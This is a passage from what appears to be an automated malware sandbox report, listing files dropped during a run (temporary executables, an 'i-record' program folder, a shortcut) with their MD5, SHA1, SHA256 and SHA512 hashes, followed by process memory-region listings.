                                                                                                            9c0d294c05fc1d88d698034609bb81c0c69196327594e4c69d2915c80fd9850c

                                                                                                            SHA512

                                                                                                            b77fe2d86fbc5bd116d6a073eb447e76a74add3fa0d0b801f97535963241be3cdce1dbcaed603b78f020d0845b2d4bfc892ceb2a7d1c8f1d98abc4812ef5af21

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\8204.exe
                                                                                                            MD5

                                                                                                            f6fa4c09ce76fd0ce97d147751023a58

                                                                                                            SHA1

                                                                                                            9778955cdf7af23e4e31bfe94d06747c3a4a4511

                                                                                                            SHA256

                                                                                                            bf95bc109f6d9577ccc4fefdc9c9ffcb3b5f4bf53ea0751044255bd7bffa5d78

                                                                                                            SHA512

                                                                                                            41435375bcd2a61611b8bd83393220f6215110427656bf803d2d4e8385665d6953c28d14b8788d530bc24c8f3a022d2c4d94ca2ac5c48e39c2d9411e4bc947a5

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\8204.exe
                                                                                                            MD5

                                                                                                            f6fa4c09ce76fd0ce97d147751023a58

                                                                                                            SHA1

                                                                                                            9778955cdf7af23e4e31bfe94d06747c3a4a4511

                                                                                                            SHA256

                                                                                                            bf95bc109f6d9577ccc4fefdc9c9ffcb3b5f4bf53ea0751044255bd7bffa5d78

                                                                                                            SHA512

                                                                                                            41435375bcd2a61611b8bd83393220f6215110427656bf803d2d4e8385665d6953c28d14b8788d530bc24c8f3a022d2c4d94ca2ac5c48e39c2d9411e4bc947a5

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\8495.exe
                                                                                                            MD5

                                                                                                            912e3bdf2de1c6096b761220c3d4a34e

                                                                                                            SHA1

                                                                                                            a33ab8d2f11889392e0bb9c6b5626d4bace343ce

                                                                                                            SHA256

                                                                                                            e643e1fc3bc4232f1d294d6e1bc19bf2941927e7390f9deeb62c9b563a7f3f4c

                                                                                                            SHA512

                                                                                                            7be3da5a08e9f170c9d4968e46f02c0ce5633e973d017206ef070363dbdbf4129df9dddd1c2968fceb9889ef7b17c33e7e5f2075b26f428d7d17bf307c971511

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\8495.exe
                                                                                                            MD5

                                                                                                            912e3bdf2de1c6096b761220c3d4a34e

                                                                                                            SHA1

                                                                                                            a33ab8d2f11889392e0bb9c6b5626d4bace343ce

                                                                                                            SHA256

                                                                                                            e643e1fc3bc4232f1d294d6e1bc19bf2941927e7390f9deeb62c9b563a7f3f4c

                                                                                                            SHA512

                                                                                                            7be3da5a08e9f170c9d4968e46f02c0ce5633e973d017206ef070363dbdbf4129df9dddd1c2968fceb9889ef7b17c33e7e5f2075b26f428d7d17bf307c971511

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\8c-6fee6-74b-688bd-579e0c84b3944\Firukumyco.exe
                                                                                                            MD5

                                                                                                            80d3b99883e3ba413ca46e2770e85201

                                                                                                            SHA1

                                                                                                            a6b59ce7e75b56548eeab8d8fb45122aec63ea2a

                                                                                                            SHA256

                                                                                                            aaef86f50788b7a36f9850da35a37153c1847855a0dcb286cdf8645f8ba7e23e

                                                                                                            SHA512

                                                                                                            755579739f289b1aa8a70a08fd51435f5b88ff51265b0f00ecf99075f192a4c1dd03fe1dae22fa7bec1e4405635c283ebe7673076d69ff0175a939f15a785f7e

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\8c-6fee6-74b-688bd-579e0c84b3944\Firukumyco.exe
                                                                                                            MD5

                                                                                                            80d3b99883e3ba413ca46e2770e85201

                                                                                                            SHA1

                                                                                                            a6b59ce7e75b56548eeab8d8fb45122aec63ea2a

                                                                                                            SHA256

                                                                                                            aaef86f50788b7a36f9850da35a37153c1847855a0dcb286cdf8645f8ba7e23e

                                                                                                            SHA512

                                                                                                            755579739f289b1aa8a70a08fd51435f5b88ff51265b0f00ecf99075f192a4c1dd03fe1dae22fa7bec1e4405635c283ebe7673076d69ff0175a939f15a785f7e

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\8c-6fee6-74b-688bd-579e0c84b3944\Firukumyco.exe.config
                                                                                                            MD5

                                                                                                            98d2687aec923f98c37f7cda8de0eb19

                                                                                                            SHA1

                                                                                                            f6dcfcdcfe570340ecdbbd9e2a61f3cb4f281ba7

                                                                                                            SHA256

                                                                                                            8a94163256a722ef8cc140bcd115a5b8f8725c04fe158b129d47be81cb693465

                                                                                                            SHA512

                                                                                                            95c7290d59749df8df495e04789c1793265e0f34e0d091df5c0d4aefe1af4c8ac1f5460f1f198fc28c4c8c900827b8f22e2851957bbaea5914ea962b3a1d0590

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\9659.exe
                                                                                                            MD5

                                                                                                            3d6f1f083d7f3b98fe2724c4713a107d

                                                                                                            SHA1

                                                                                                            4593e372a0477bef2c32f17dca1f530161e6fcdf

                                                                                                            SHA256

                                                                                                            6afd68e9c2a3424c8afacada13704068b84ec11406db6c20949e97cdf150ada5

                                                                                                            SHA512

                                                                                                            e91928b98c44be8c1fe09fb119aa3d57c9e913c39675df761f2d799ee334cb3a2daf788e1ad11b016869dc6b9aefef649fc67f98efff847643d2a095874da08f

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\9659.exe
                                                                                                            MD5

                                                                                                            3d6f1f083d7f3b98fe2724c4713a107d

                                                                                                            SHA1

                                                                                                            4593e372a0477bef2c32f17dca1f530161e6fcdf

                                                                                                            SHA256

                                                                                                            6afd68e9c2a3424c8afacada13704068b84ec11406db6c20949e97cdf150ada5

                                                                                                            SHA512

                                                                                                            e91928b98c44be8c1fe09fb119aa3d57c9e913c39675df761f2d799ee334cb3a2daf788e1ad11b016869dc6b9aefef649fc67f98efff847643d2a095874da08f

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\98FA.exe
                                                                                                            MD5

                                                                                                            9a1906e9cb483dee2f12d241e291c9f9

                                                                                                            SHA1

                                                                                                            0a103a37938429a5bef6007c34a1f81fe62878e1

                                                                                                            SHA256

                                                                                                            74001856b944a699f162dd54f64e19408c01cfc42cabbe645ad156dfa0945d86

                                                                                                            SHA512

                                                                                                            8f57e569dfc18f4ebdaeca44a3f272162f4d49f7898cc021b9af239ff51c00ea20b2e1a1456a062aa78783e3aa58da1de76ab4a4019e3ed63c0567427bcc4c39

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\98FA.exe
                                                                                                            MD5

                                                                                                            9a1906e9cb483dee2f12d241e291c9f9

                                                                                                            SHA1

                                                                                                            0a103a37938429a5bef6007c34a1f81fe62878e1

                                                                                                            SHA256

                                                                                                            74001856b944a699f162dd54f64e19408c01cfc42cabbe645ad156dfa0945d86

                                                                                                            SHA512

                                                                                                            8f57e569dfc18f4ebdaeca44a3f272162f4d49f7898cc021b9af239ff51c00ea20b2e1a1456a062aa78783e3aa58da1de76ab4a4019e3ed63c0567427bcc4c39

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\A34C.exe
                                                                                                            MD5

                                                                                                            b6b990b4a20129714d48a0b66fde5166

                                                                                                            SHA1

                                                                                                            7cf14e72cea83cc7be05e5825d30033b84b1db96

                                                                                                            SHA256

                                                                                                            fce4f99cc42559928438a080e7ab02a8a071c98bf30cac8fc38b36134efc580c

                                                                                                            SHA512

                                                                                                            27d62d5171eefabc2cf401764ae0cf59a417fa8a4c79788eee8a186bfee1558da024bea795ce6676cfb245750c87b937f3ff13f8bfed2d767537f65764b49854

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\A34C.exe
                                                                                                            MD5

                                                                                                            b6b990b4a20129714d48a0b66fde5166

                                                                                                            SHA1

                                                                                                            7cf14e72cea83cc7be05e5825d30033b84b1db96

                                                                                                            SHA256

                                                                                                            fce4f99cc42559928438a080e7ab02a8a071c98bf30cac8fc38b36134efc580c

                                                                                                            SHA512

                                                                                                            27d62d5171eefabc2cf401764ae0cf59a417fa8a4c79788eee8a186bfee1558da024bea795ce6676cfb245750c87b937f3ff13f8bfed2d767537f65764b49854

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\B3B8.exe
                                                                                                            MD5

                                                                                                            84594c9b7bbd67dd00d62c1dce396b3e

                                                                                                            SHA1

                                                                                                            801d50be77ce8c25a887382c457c118335f7fa7a

                                                                                                            SHA256

                                                                                                            9d9ef7f7c6be10d7c65afe88d0a39b6ec5e967e1fb9d88c5abc9e80e3a2a7824

                                                                                                            SHA512

                                                                                                            edea0d698e1087f395fef4f6f005636513582fd431e51feae59e5bde14f39b6ec8547d19007da9ac4038a138239ef06618d0d33ed1846703ed91af4ee41f1cac

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\B3B8.exe
                                                                                                            MD5

                                                                                                            84594c9b7bbd67dd00d62c1dce396b3e

                                                                                                            SHA1

                                                                                                            801d50be77ce8c25a887382c457c118335f7fa7a

                                                                                                            SHA256

                                                                                                            9d9ef7f7c6be10d7c65afe88d0a39b6ec5e967e1fb9d88c5abc9e80e3a2a7824

                                                                                                            SHA512

                                                                                                            edea0d698e1087f395fef4f6f005636513582fd431e51feae59e5bde14f39b6ec8547d19007da9ac4038a138239ef06618d0d33ed1846703ed91af4ee41f1cac

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\C1C2.exe
                                                                                                            MD5

                                                                                                            d551053a5a01497f5df5b5aed7b10e98

                                                                                                            SHA1

                                                                                                            c1fd00d00905d6ed086ae0346644ed8dc6385f20

                                                                                                            SHA256

                                                                                                            4f387205a26aee36915ab1052e3f010153308ff89e3b5554b2d6fca324a69b40

                                                                                                            SHA512

                                                                                                            7c1310b10fed7a9715dbe04b31089486beadb3bae94bfe78893d4dba12fb3ff054227b1adf34b949f878b33770120b03763184cba374df58e9298c15f0f6371a

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\C1C2.exe
                                                                                                            MD5

                                                                                                            d551053a5a01497f5df5b5aed7b10e98

                                                                                                            SHA1

                                                                                                            c1fd00d00905d6ed086ae0346644ed8dc6385f20

                                                                                                            SHA256

                                                                                                            4f387205a26aee36915ab1052e3f010153308ff89e3b5554b2d6fca324a69b40

                                                                                                            SHA512

                                                                                                            7c1310b10fed7a9715dbe04b31089486beadb3bae94bfe78893d4dba12fb3ff054227b1adf34b949f878b33770120b03763184cba374df58e9298c15f0f6371a

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\CA7E.exe
                                                                                                            MD5

                                                                                                            2bf010562f11b1f2c7d102e12b9a24f8

                                                                                                            SHA1

                                                                                                            b9c50ba95b717968b5f4b44357cc97792e8dcb2e

                                                                                                            SHA256

                                                                                                            d312d1e038f490f2b5cb04757e337c84bc35953213ef8f085963355d0386828e

                                                                                                            SHA512

                                                                                                            69e1a81cc59d5331f2e014d679470378be52816c95ace6183b05113490a5a7208d849628b23f02db69100de3337b065f56ea24384299b5e374ad6e6bcd46e5de

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\CA7E.exe
                                                                                                            MD5

                                                                                                            2bf010562f11b1f2c7d102e12b9a24f8

                                                                                                            SHA1

                                                                                                            b9c50ba95b717968b5f4b44357cc97792e8dcb2e

                                                                                                            SHA256

                                                                                                            d312d1e038f490f2b5cb04757e337c84bc35953213ef8f085963355d0386828e

                                                                                                            SHA512

                                                                                                            69e1a81cc59d5331f2e014d679470378be52816c95ace6183b05113490a5a7208d849628b23f02db69100de3337b065f56ea24384299b5e374ad6e6bcd46e5de

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\D397.exe
                                                                                                            MD5

                                                                                                            6c175aa74c7777d718bfa4016e3f1be3

                                                                                                            SHA1

                                                                                                            858c405908e48432fe64ecb8cc22d767176c1d18

                                                                                                            SHA256

                                                                                                            a7d7e3a09050aefcdf58b21a1341afe74cc1e2e6b0e82e8b8a1d35caf09600eb

                                                                                                            SHA512

                                                                                                            e0c96a9c49011a51aab7f3474a1daf156e9cf854817c070b27af4a3cb9b124effd995be81623ad90e9ffe44b17edc19419241e447157621f4365ed571afafc19

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\D397.exe
                                                                                                            MD5

                                                                                                            6c175aa74c7777d718bfa4016e3f1be3

                                                                                                            SHA1

                                                                                                            858c405908e48432fe64ecb8cc22d767176c1d18

                                                                                                            SHA256

                                                                                                            a7d7e3a09050aefcdf58b21a1341afe74cc1e2e6b0e82e8b8a1d35caf09600eb

                                                                                                            SHA512

                                                                                                            e0c96a9c49011a51aab7f3474a1daf156e9cf854817c070b27af4a3cb9b124effd995be81623ad90e9ffe44b17edc19419241e447157621f4365ed571afafc19

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\DBE5.exe
                                                                                                            MD5

                                                                                                            f471f52cbe1f63d8c9a55e4fa518887b

                                                                                                            SHA1

                                                                                                            2b3fb928296fef46c65e382364384c540558c34f

                                                                                                            SHA256

                                                                                                            c751589c20e464ad1e662e39299cca45919e24ea24529e03cb03928edeb81a6b

                                                                                                            SHA512

                                                                                                            b4545029a9d7625977dca6ab02f9d3ddbfeb4f84e2222cf9b71bfab66f8ed652196eb5c2065cdc344dd9eb5dd950ea62e282d8a48f887e618f417a1d9335f345

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-68I7T.tmp\1075474_ah_hot_iconçè_)))_.exe
                                                                                                            MD5

                                                                                                            775d0433a179496b2f43779ad19b42fe

                                                                                                            SHA1

                                                                                                            2c19a62b0ea22cd87ecc319f69aa2cb0760d6ff2

                                                                                                            SHA256

                                                                                                            a996ffed3f88a5b1448ff665369eb47e1be01c2f95cf4f890406e4f2bc34c1e5

                                                                                                            SHA512

                                                                                                            b12d7df3dee6cc06e855467bb126ee883b8127b24ad42aa0462f67aee0448a25c2d0e84291dbfc732de76c05c6a87d1c079d35a86f22a6c08ae32d5bcb2ffb70

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-68I7T.tmp\1075474_ah_hot_iconçè_)))_.exe
                                                                                                            MD5

                                                                                                            775d0433a179496b2f43779ad19b42fe

                                                                                                            SHA1

                                                                                                            2c19a62b0ea22cd87ecc319f69aa2cb0760d6ff2

                                                                                                            SHA256

                                                                                                            a996ffed3f88a5b1448ff665369eb47e1be01c2f95cf4f890406e4f2bc34c1e5

                                                                                                            SHA512

                                                                                                            b12d7df3dee6cc06e855467bb126ee883b8127b24ad42aa0462f67aee0448a25c2d0e84291dbfc732de76c05c6a87d1c079d35a86f22a6c08ae32d5bcb2ffb70

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-FJ7BT.tmp\irecord.tmp
                                                                                                            MD5

                                                                                                            b5ffb69c517bd2ee5411f7a24845c829

                                                                                                            SHA1

                                                                                                            1a470a89a3f03effe401bb77b246ced24f5bc539

                                                                                                            SHA256

                                                                                                            b09d330ec5fce569bc7ce5068ad6cafdb0d947fcc779b3362a424db1a2fa29be

                                                                                                            SHA512

                                                                                                            5a771ad4237a7ec0159bbba2179fadf067e6d09d80e9f1fb701ffd62ed0203192d20adbe9dd4df4bfb0191cdccecadaf71ecec4a52de06f8ef338905cbea3465

                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-TOPLN.tmp\8495.tmp
                                                                                                            MD5

                                                                                                            74199e09ec24abc7347dc79f50d1f8fd

                                                                                                            SHA1

                                                                                                            ce2213c273c6083026e027c3d4799793686271aa

                                                                                                            SHA256

                                                                                                            23b95490719ba6395533ebefb61ccd36ab57d17998c20fe5ed6cccff2c9dab5b

                                                                                                            SHA512

                                                                                                            8f333e98e62c18dc8ba77dbac56028032d710f56a3f947431313627c6a0c5dd24f803bdc7b9a87c5999f17ceb976bfbbd90c06cfe8bfd14422d6728d2a2364fc

                                                                                                          • C:\Users\Admin\AppData\Local\b7ad1122-5de5-4669-90c0-a4b343a46a5b\7263.exe
                                                                                                            MD5

                                                                                                            0d53a936fac69fd51e0665679c2054a9

                                                                                                            SHA1

                                                                                                            49ae732d0fa1b3d31b641951d684d61aa77ff334

                                                                                                            SHA256

                                                                                                            d1215f78c8f0150c45cbb3d8536ff02a67a40b8f94d3e5c8157b613e20ef91e9

                                                                                                            SHA512

                                                                                                            2becef9bdee726e9c136250277968e1b7a84f2f0059b4e50fa5369aa2af1796c01281df7c3f9e4b663856a8518db63c932b1b9c06cb7cff00853c54b2bbc2d4a

                                                                                                          • C:\Users\Admin\vuubsors.exe
                                                                                                            MD5

                                                                                                            b405b8dce0fe428fc8b3336617a7c47a

                                                                                                            SHA1

                                                                                                            b031701c3c65f93949317f45737cddbc5b5f97d6

                                                                                                            SHA256

                                                                                                            c790daa45acfd55d56f91f3ae1a906b97beb811256e41f310841eb09f5f3d63a

                                                                                                            SHA512

                                                                                                            198493503be1c7e1b9571658fdffd3c1d085a3ba9dfc4508f078b7264d92b53dea76102869ddcbdd4d392666440653b0c6ebf911c27eba4e91d1ad92b745ff18

                                                                                                          • C:\Users\Admin\vuubsors.exe
                                                                                                            MD5

                                                                                                            b405b8dce0fe428fc8b3336617a7c47a

                                                                                                            SHA1

                                                                                                            b031701c3c65f93949317f45737cddbc5b5f97d6

                                                                                                            SHA256

                                                                                                            c790daa45acfd55d56f91f3ae1a906b97beb811256e41f310841eb09f5f3d63a

                                                                                                            SHA512

                                                                                                            198493503be1c7e1b9571658fdffd3c1d085a3ba9dfc4508f078b7264d92b53dea76102869ddcbdd4d392666440653b0c6ebf911c27eba4e91d1ad92b745ff18

                                                                                                          • C:\Users\Public\Desktop\i-record.lnk
                                                                                                            MD5

                                                                                                            a05a223fe9ba4274f91108190dbc575d

                                                                                                            SHA1

                                                                                                            c4aa61200227376dcf1a3ef106005a11fd5348ff

                                                                                                            SHA256

                                                                                                            27dc98480fb2a3959ff8f1d9ffa04ea0c3d66b015808e1d0dbd6cab5f46ef79a

                                                                                                            SHA512

                                                                                                            a49cacf66bb55586ca5be2d5e92602d7f46a41f699e0742eadb119e5f38c82c0b588a7eacd6fb560f9656a039127ccfbdba0864d62b72961b2a21c3e30580e0c

                                                                                                          • \??\c:\users\admin\appdata\local\temp\is-fj7bt.tmp\irecord.tmp
                                                                                                            MD5

                                                                                                            b5ffb69c517bd2ee5411f7a24845c829

                                                                                                            SHA1

                                                                                                            1a470a89a3f03effe401bb77b246ced24f5bc539

                                                                                                            SHA256

                                                                                                            b09d330ec5fce569bc7ce5068ad6cafdb0d947fcc779b3362a424db1a2fa29be

                                                                                                            SHA512

                                                                                                            5a771ad4237a7ec0159bbba2179fadf067e6d09d80e9f1fb701ffd62ed0203192d20adbe9dd4df4bfb0191cdccecadaf71ecec4a52de06f8ef338905cbea3465

                                                                                                          • \??\c:\users\admin\appdata\local\temp\is-topln.tmp\8495.tmp
                                                                                                            MD5

                                                                                                            74199e09ec24abc7347dc79f50d1f8fd

                                                                                                            SHA1

                                                                                                            ce2213c273c6083026e027c3d4799793686271aa

                                                                                                            SHA256

                                                                                                            23b95490719ba6395533ebefb61ccd36ab57d17998c20fe5ed6cccff2c9dab5b

                                                                                                            SHA512

                                                                                                            8f333e98e62c18dc8ba77dbac56028032d710f56a3f947431313627c6a0c5dd24f803bdc7b9a87c5999f17ceb976bfbbd90c06cfe8bfd14422d6728d2a2364fc

                                                                                                          • \Program Files (x86)\i-record\AForge.Video.FFMPEG.dll
                                                                                                            MD5

                                                                                                            5f60669a79e4c4285325284ab662a0c0

                                                                                                            SHA1

                                                                                                            5b83f8f2799394df3751799605e9292b21b78504

                                                                                                            SHA256

                                                                                                            3f6aa370d70259dc55241950d669d2bf3dc7b57a0c45c6a2f8dec0d8c8cc35b0

                                                                                                            SHA512

                                                                                                            6ec9fe576daa4fde11a39a929dd23ab44297521c4d23352af1a78716cc3ec7927aa6949d5f7af638148e58e5b6d1d16043ad1a7b0dabb8103acc07d0d4c8a42f

                                                                                                          • \Program Files (x86)\i-record\AForge.Video.FFMPEG.dll
                                                                                                            MD5

                                                                                                            5f60669a79e4c4285325284ab662a0c0

                                                                                                            SHA1

                                                                                                            5b83f8f2799394df3751799605e9292b21b78504

                                                                                                            SHA256

                                                                                                            3f6aa370d70259dc55241950d669d2bf3dc7b57a0c45c6a2f8dec0d8c8cc35b0

                                                                                                            SHA512

                                                                                                            6ec9fe576daa4fde11a39a929dd23ab44297521c4d23352af1a78716cc3ec7927aa6949d5f7af638148e58e5b6d1d16043ad1a7b0dabb8103acc07d0d4c8a42f

                                                                                                          • \Program Files (x86)\i-record\AForge.Video.FFMPEG.dll
                                                                                                            MD5

                                                                                                            5f60669a79e4c4285325284ab662a0c0

                                                                                                            SHA1

                                                                                                            5b83f8f2799394df3751799605e9292b21b78504

                                                                                                            SHA256

                                                                                                            3f6aa370d70259dc55241950d669d2bf3dc7b57a0c45c6a2f8dec0d8c8cc35b0

                                                                                                            SHA512

                                                                                                            6ec9fe576daa4fde11a39a929dd23ab44297521c4d23352af1a78716cc3ec7927aa6949d5f7af638148e58e5b6d1d16043ad1a7b0dabb8103acc07d0d4c8a42f

                                                                                                          • \Program Files (x86)\i-record\avcodec-53.dll
                                                                                                            MD5

                                                                                                            65f639a2eda8db2a1ea40b5ddb5a2ed4

                                                                                                            SHA1

                                                                                                            3f32853740928c5e88b15fdc86c95a2ebd8aeb37

                                                                                                            SHA256

                                                                                                            e4e41c0c1c85e2aeaff1bea914880d2cb01b153a1a9ceddccaf05f8b5362210d

                                                                                                            SHA512

                                                                                                            980b6a5511716073d5eeb8b5437c6f23bda300402c64d05d2a54da614e3ef1412743ec5bb4100e54699d7a74f8c437560cb9faa67824cbbabdf1f9399945e21b

                                                                                                          • \Program Files (x86)\i-record\avformat-53.dll
                                                                                                            MD5

                                                                                                            11340a55f155a904596bf3a13788a93a

                                                                                                            SHA1

                                                                                                            92a2f79717f71696ebde3c400aa52804eda5984e

                                                                                                            SHA256

                                                                                                            b26b2df18537b3df6706aa9e743d1a1e511a6fd21f7f7815f15ef96bb09a85e9

                                                                                                            SHA512

                                                                                                            2dc2bb8b0b4a38ddee62d85fdf7c551b0b77f5b9c7791cf82a00eea847f86006df5139874381dd6db739bb77ec008be9f32185ec71ca8be603f7fe515662c78b

                                                                                                          • \Program Files (x86)\i-record\avutil-51.dll
                                                                                                            MD5

                                                                                                            78128217a6151041fc8f7f29960bdd2a

                                                                                                            SHA1

                                                                                                            a6fe2fa059334871181f60b626352e8325cbdda8

                                                                                                            SHA256

                                                                                                            678ca4d9f4d4ad1703006026afe3df5490664c05bb958b991c028ce9314757f7

                                                                                                            SHA512

                                                                                                            5f534a8b186797046526cfb29f95e89e90c555cf54cc8e99a801dfe9327433c9c0fd2cb63a335ade606075c9fab5173c1ad805242ceb04bc1fd78f37da166d84

                                                                                                          • \Program Files (x86)\i-record\swscale-2.dll
                                                                                                            MD5

                                                                                                            564dca64680d608517721cdbe324b1d6

                                                                                                            SHA1

                                                                                                            f2683fa13772fc85c3ea4cffa3d896373a603ad3

                                                                                                            SHA256

                                                                                                            f9550ace57ce5b19add143e507179dc601a832b054963d1c3b5c003f1a8149cc

                                                                                                            SHA512

                                                                                                            1d80e9de29320201c988e8b11036c423d83620e99bcadec5142eb14b6513e49d9b41904e92154139e327cd5cc6f058b4bb467ee4fbb342794296e0dfe774dc75

                                                                                                          • \Program Files (x86)\i-record\swscale-2.dll
                                                                                                            MD5

                                                                                                            564dca64680d608517721cdbe324b1d6

                                                                                                            SHA1

                                                                                                            f2683fa13772fc85c3ea4cffa3d896373a603ad3

                                                                                                            SHA256

                                                                                                            f9550ace57ce5b19add143e507179dc601a832b054963d1c3b5c003f1a8149cc

                                                                                                            SHA512

                                                                                                            1d80e9de29320201c988e8b11036c423d83620e99bcadec5142eb14b6513e49d9b41904e92154139e327cd5cc6f058b4bb467ee4fbb342794296e0dfe774dc75

                                                                                                          • \Users\Admin\AppData\Local\Temp\1105.tmp
                                                                                                            MD5

                                                                                                            50741b3f2d7debf5d2bed63d88404029

                                                                                                            SHA1

                                                                                                            56210388a627b926162b36967045be06ffb1aad3

                                                                                                            SHA256

                                                                                                            f2f8732ae464738372ff274b7e481366cecdd2337210d4a3cbcd089c958a730c

                                                                                                            SHA512

                                                                                                            fac6bfe35b1ee08b3d42d330516a260d9cdb4a90bbb0491411a583029b92a59d20af3552372ea8fb3f59442b3945bf524ef284127f397ae7179467080be8e9b3

                                                                                                          • \Users\Admin\AppData\Local\Temp\AE30.tmp
                                                                                                            MD5

                                                                                                            50741b3f2d7debf5d2bed63d88404029

                                                                                                            SHA1

                                                                                                            56210388a627b926162b36967045be06ffb1aad3

                                                                                                            SHA256

                                                                                                            f2f8732ae464738372ff274b7e481366cecdd2337210d4a3cbcd089c958a730c

                                                                                                            SHA512

                                                                                                            fac6bfe35b1ee08b3d42d330516a260d9cdb4a90bbb0491411a583029b92a59d20af3552372ea8fb3f59442b3945bf524ef284127f397ae7179467080be8e9b3

                                                                                                          • \Users\Admin\AppData\Local\Temp\is-68I7T.tmp\idp.dll
                                                                                                            MD5

                                                                                                            8f995688085bced38ba7795f60a5e1d3

                                                                                                            SHA1

                                                                                                            5b1ad67a149c05c50d6e388527af5c8a0af4343a

                                                                                                            SHA256

                                                                                                            203d7b61eac96de865ab3b586160e72c78d93ab5532b13d50ef27174126fd006

                                                                                                            SHA512

                                                                                                            043d41947ab69fc9297dcb5ad238acc2c35250d1172869945ed1a56894c10f93855f0210cbca41ceee9efb55fd56a35a4ec03c77e252409edc64bfb5fb821c35

                                                                                                          • memory/8-246-0x0000000000000000-mapping.dmp
                                                                                                          • memory/364-253-0x0000000000000000-mapping.dmp
                                                                                                          • memory/484-160-0x0000000000000000-mapping.dmp
                                                                                                          • memory/484-167-0x0000000000400000-0x000000000046D000-memory.dmp
                                                                                                            Filesize

                                                                                                            436KB

                                                                                                          • memory/484-356-0x0000000000000000-mapping.dmp
                                                                                                          • memory/576-169-0x0000000003470000-0x0000000003480000-memory.dmp
                                                                                                            Filesize

                                                                                                            64KB

                                                                                                          • memory/576-189-0x0000000004980000-0x0000000004988000-memory.dmp
                                                                                                            Filesize

                                                                                                            32KB

                                                                                                          • memory/576-194-0x0000000003470000-0x00000000034D0000-memory.dmp
                                                                                                            Filesize

                                                                                                            384KB

                                                                                                          • memory/576-193-0x0000000004980000-0x0000000004988000-memory.dmp
                                                                                                            Filesize

                                                                                                            32KB

                                                                                                          • memory/576-159-0x0000000000400000-0x0000000000651000-memory.dmp
                                                                                                            Filesize

                                                                                                            2.3MB

                                                                                                          • memory/576-182-0x0000000004B60000-0x0000000004B68000-memory.dmp
                                                                                                            Filesize

                                                                                                            32KB

                                                                                                          • memory/576-175-0x0000000003610000-0x0000000003620000-memory.dmp
                                                                                                            Filesize

                                                                                                            64KB

                                                                                                          • memory/576-156-0x0000000000000000-mapping.dmp
                                                                                                          • memory/576-181-0x0000000004820000-0x0000000004828000-memory.dmp
                                                                                                            Filesize

                                                                                                            32KB

                                                                                                          • memory/736-258-0x0000000000000000-mapping.dmp
                                                                                                          • memory/768-384-0x0000000000000000-mapping.dmp
                                                                                                          • memory/800-355-0x0000000000000000-mapping.dmp
                                                                                                          • memory/928-115-0x0000000000402F68-mapping.dmp
                                                                                                          • memory/928-114-0x0000000000400000-0x000000000040C000-memory.dmp
                                                                                                            Filesize

                                                                                                            48KB

                                                                                                          • memory/1132-233-0x0000000000000000-mapping.dmp
                                                                                                          • memory/1364-252-0x00000000025E0000-0x00000000025E2000-memory.dmp
                                                                                                            Filesize

                                                                                                            8KB

                                                                                                          • memory/1364-241-0x0000000000000000-mapping.dmp
                                                                                                          • memory/1552-254-0x0000000000000000-mapping.dmp
                                                                                                          • memory/1552-295-0x0000000002564000-0x0000000002565000-memory.dmp
                                                                                                            Filesize

                                                                                                            4KB

                                                                                                          • memory/1552-317-0x0000000002565000-0x0000000002566000-memory.dmp
                                                                                                            Filesize

                                                                                                            4KB

                                                                                                          • memory/1552-263-0x0000000002560000-0x0000000002562000-memory.dmp
                                                                                                            Filesize

                                                                                                            8KB

                                                                                                          • memory/1552-299-0x0000000002562000-0x0000000002564000-memory.dmp
                                                                                                            Filesize

                                                                                                            8KB

                                                                                                          • memory/1716-217-0x0000000000000000-mapping.dmp
                                                                                                          • memory/1796-191-0x0000000000E70000-0x0000000000E72000-memory.dmp
                                                                                                            Filesize

                                                                                                            8KB

                                                                                                          • memory/1796-183-0x0000000000000000-mapping.dmp
                                                                                                          • memory/1816-265-0x0000000000400000-0x0000000000D41000-memory.dmp
                                                                                                            Filesize

                                                                                                            9.3MB

                                                                                                          • memory/1816-262-0x0000000002DF0000-0x0000000003716000-memory.dmp
                                                                                                            Filesize

                                                                                                            9.1MB

                                                                                                          • memory/1816-218-0x0000000000000000-mapping.dmp
                                                                                                          • memory/1968-251-0x0000000000400000-0x0000000000417000-memory.dmp
                                                                                                            Filesize

                                                                                                            92KB

                                                                                                          • memory/1968-236-0x0000000000000000-mapping.dmp
                                                                                                          • memory/2068-323-0x0000000000000000-mapping.dmp
                                                                                                          • memory/2068-364-0x0000000002160000-0x00000000021FD000-memory.dmp
                                                                                                            Filesize

                                                                                                            628KB

                                                                                                          • memory/2100-137-0x0000000000000000-mapping.dmp
                                                                                                          • memory/2100-138-0x0000000001070000-0x0000000001075000-memory.dmp
                                                                                                            Filesize

                                                                                                            20KB

                                                                                                          • memory/2100-139-0x0000000001060000-0x0000000001069000-memory.dmp
                                                                                                            Filesize

                                                                                                            36KB

                                                                                                          • memory/2140-126-0x00000000005A0000-0x00000000005A7000-memory.dmp
                                                                                                            Filesize

                                                                                                            28KB

                                                                                                          • memory/2140-127-0x0000000000590000-0x000000000059C000-memory.dmp
                                                                                                            Filesize

                                                                                                            48KB

                                                                                                          • memory/2140-125-0x0000000000000000-mapping.dmp
                                                                                                          • memory/2208-320-0x0000000002430000-0x0000000002431000-memory.dmp
                                                                                                            Filesize

                                                                                                            4KB

                                                                                                          • memory/2208-314-0x0000000002440000-0x0000000002459000-memory.dmp
                                                                                                            Filesize

                                                                                                            100KB

